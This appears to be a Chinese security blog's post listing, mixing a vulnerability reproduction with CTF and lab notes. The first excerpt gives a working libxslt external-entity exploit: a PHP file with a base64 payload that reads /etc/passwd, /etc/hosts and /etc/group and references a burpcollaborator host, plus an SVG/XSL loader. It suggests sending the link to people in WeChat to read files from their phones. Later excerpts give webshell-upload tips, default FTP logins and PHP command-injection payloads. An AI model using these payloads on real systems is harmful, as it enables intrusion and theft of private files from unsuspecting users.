Posts

漏洞描述 Libxslt 是基于 WebKit 的浏览器（如 Chrome、Safari 等）中使用的默认 XSL（eXtensible Stylesheet Language）库。Libxslt 允许通过 XSL 的 document() 方法加载的文档中包含外部实体。攻击者可以绕过安全限制，从 http(s):// URL 中访问 file:// URL，并获得文件访问权限。 在默认沙盒环境下，攻击者可以在 iOS（Safari/Chrome）、Mac（Safari/Chrome）、Android（Chrome）和Samsung TV（默认浏览器）上读取 /etc/hosts(主机)文件。当使用 -no-sandbox 属性时（Electron/PhantomJS），攻击者可以在任何操作系统上读取任何文件。（有趣的是，实测鸿蒙是唯一一个没被影响的系统） 而且微信自带的浏览器是没有开沙箱的，也就是说存在任意文件读取 漏洞复现 先来看看exp.php <?php header("Access-Control-Allow-Origin: *"); echo base64_decode("PD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3htbCIgaHJlZj0iaHR0cDovLzY0OG92OTJndGFtcDFyMHVuYmZ1aXE0djBtNmN1MS5idXJwY29sbGFib3JhdG9yLm5ldCI/Pgo8IURPQ1RZUEUgcCBbCjwhRU5USVRZIHBhc3N3ZCBTWVNURU0gImZpbGU6Ly8vZXRjL3Bhc3N3ZCI+CjwhRU5USVRZIGhvc3RzIFNZU1RFTSAiZmlsZTovLy9ldGMvaG9zdHMiPgo8IUVOVElUWSBncm91cCBTWVNURU0gImZpbGU6Ly9sb2NhbGhvc3QvZXRjL2dyb3VwIj4KCl0+IA=="); ?> <p> <p style="border-style: dotted;">/etc/passwd: &passwd; </p> <p style="border-style: dotted;">/etc/hosts: &hosts; </p> <p style="border-style: dotted;">/etc/group: &group; </p> </p> 再新建一个 exp.svg 文件在 document引用加载刚才新建的文件exp.php <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xsl" href="?#"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <svg width="1000%" height="1000%" version="1.1" xmlns="http://www.w3.org/2000/svg"> <foreignObject class="node" font-size="18" width="100%" height="100%"> <body xmlns="http://www.w3.org/1999/xhtml"> <xmp><xsl:copy-of select="document('exp.php')"/></xmp> <script type="text/javascript"> </script> </body> </foreignObject> </svg> </xsl:template> </xsl:stylesheet> 利用上述exp代码在本地搭建一个简单php web服务，在微信把链接发给别人，即可读取到别人手机上的/etc/passwd等敏感信息（下面测试环境是安卓8.0和IOS16.5，均为截至2023.11.22最新版微信） ...

本期靶场：Hackable3 and Aragog and Me an My girlfriend FTP服务的上传和下载功能 get是下载，put是上传。当你拥有ftp匿名服务时，就可以试试传一句话木马 wpscan 只要碰到wordpress，就扫一扫，反正也花不了多少时间。需要注意的是，一定要定义扫描插件还是主题漏洞。 linpeas.sh 这个工具可以枚举linux操作系统几乎所有的可提权项，甚至可以通过su暴力破解本地密码。一般用来辅助提权，列出有高权限的脚本或代码 pspy64 这个工具可以用于在不需要root权限的情况下窥探进程，获取UID sudo提权 喜闻乐见的sudo提权，具体可以参考前面几章 X-Forwarded-For 如果当前页面告诉你只能在本地访问，那就加上它 平行越权 在url发现id后手痒都会想去试试看的改值，说不定会有意外收获 （好水的一章。。。不过能记录的确实只有这些）

本章靶场：HarryPotter: Fawkes FTP匿名登录 如果一台机器开启了FTP服务（例如vsftpd），那么第一步要尝试的就是能否进行匿名登录 FTP的匿名登录一般有三种： 1、 用户名：anonymous 密码：Email或者为空 2、 用户名：FTP 密码：FTP或者为空 3、 用户名：USER 密码：pass 二进制文件 当碰到一个二进制文件时，第一反应应该是去尝试运行它。使用ps -aux和grep对进程pid进行监控。或者使用ss -pantu获取socket信息，看到其监听的端口和ip 缓冲区溢出 缓冲区溢出（buffer overflow），是针对程序设计缺陷，向程序输入缓冲区写入使之溢出的内容（通常是超过缓冲区能保存的最大数据量的数据），从而破坏程序运行、趁著中断之际并获取程序乃至系统的控制权。 而缓存区溢出漏洞最重要的就是找出缓存区溢出的位置，这里可以使用edb-debugger调试工具来动态测试进程，并找出缓存区溢出漏洞的溢出位置。更多有关缓冲区溢出的实验可以看这里 tcpdump 看下面这个例子 tcpdump -i eth0 port 21 可以用来监听eth0网卡的21端口的数据收发状况 sudo提权漏洞 网上有一堆教程，拿到用户后记得去搜一下sudo的CVE

return可直接执行十六进制 RT，如果放在return后面的语句是十六进制，就会先转换成可执行命令（maybe） 函数可运算 比如1-phpinfo()-1这种语法其实是允许的，返回的内容因为函数本身返回值是1，所以结果是-1。并且phpinfo()可被执行 create_function()创建匿名函数 流程如下 但是可能看起来比较不好懂，再来看下面这个 create_function()会创建一个匿名函数（lambda样式） create_function()函数会在内部执行 eval()，我们发现是执行了后面的return语句，属于create_function()中的第二个参数string $code位置。 因此create_function函数等价于 <?php function lambda1($a,$b){ return "ln($a) + ln($b) = " . log($a * $b); } ?> 下面来看一个例子（[NISACTF 2022]level-up） <?php error_reporting(0); include "str.php"; $a = $_GET['a']; $b = $_GET['b']; if(preg_match('/^[a-z0-9_]*$/isD',$a)){ show_source(__FILE__); } else{ $a('',$b); } 构造payload的时候，注意正则匹配 preg_match('/^[a-z0-9_]*$/isD',$a，说明我们在构造payload的时候第一个字母不能为数字或者字母，所以我们需要绕过正则，这里要用\（转义符绕过，构造payload: ?a=\create_function&b=return 'Leaf';}phpinfo();/* 解释一下上面的payload： \的作用是绕过正则匹配preg_match，第一个;是让return 语句结束(其实也可以不用谢这句return，直接写后面的花括号)，}的作用是让create_function语句闭合，然后执行phpinfo();后面要加/*是为了让最后的}被注释掉来保证phpinfo()正常执行 中文变量名 对于下面这样的过滤如果束手无策 if(preg_match("/[A-Za-z0-9_\%\\|\~\'\,\.\:\@\&\*\+\- ]+/",$code)) 就可以考虑用中文名来命名变量。（可能你会觉得这很不可思议，但在php里确实是允许的） payload如下 $哈="{{{"^"?<>/";${$哈}[哼](${$哈}[嗯]);&哼=system&嗯=tac f* 其中，"{{{"^"?<>/";的结果是_GET tee 这个命令类似echo ... >，可以把...的内容写入到对应文本中。一般是配合管道使用，例如ls / |tee 1，作用就是把ls列出来的内容存入到1这个文件里。如果在进行网站敏感信息读取，访问1就能下载这个文件 php的类函数调用 php的类使用其实类似C++，比如ctf类中有个getflag函数，配合 call_user_func()或者eval()可以直接用 shell盲注 和SQL盲注类似，[awk](https://www.runoob.com/linux/linux-comm-awk.html)命令可以截取字符串，[cut](https://www.runoob.com/linux/linux-comm-cut.html)命令可以截取单个字符输出。结合shell编程里的if和sleep等命令就能判断正误。例如下面这样 ...

本章靶场：Prime: 1 FUZZ 用来用去感觉还是wfuzz好用，参数简洁明了。这个靶机下用到参数有下面这些 wpscan wpscan的-e参数，可以用来枚举用户名 wordpress修改主题文件 一个意料之外又情理之中的功能，可以用来写一句话木马 防御办法：wp禁止主题编辑操作，通过在wp-config.php中，把define(‘DISALLOW_FILE_EDIT’,true) MSF提权漏洞搜索 在拿到普通用户后，在msf中尝试searchsploit指令，后面加上系统的版本信息，就能找到提权漏洞的exp，编译后上传，再运行即可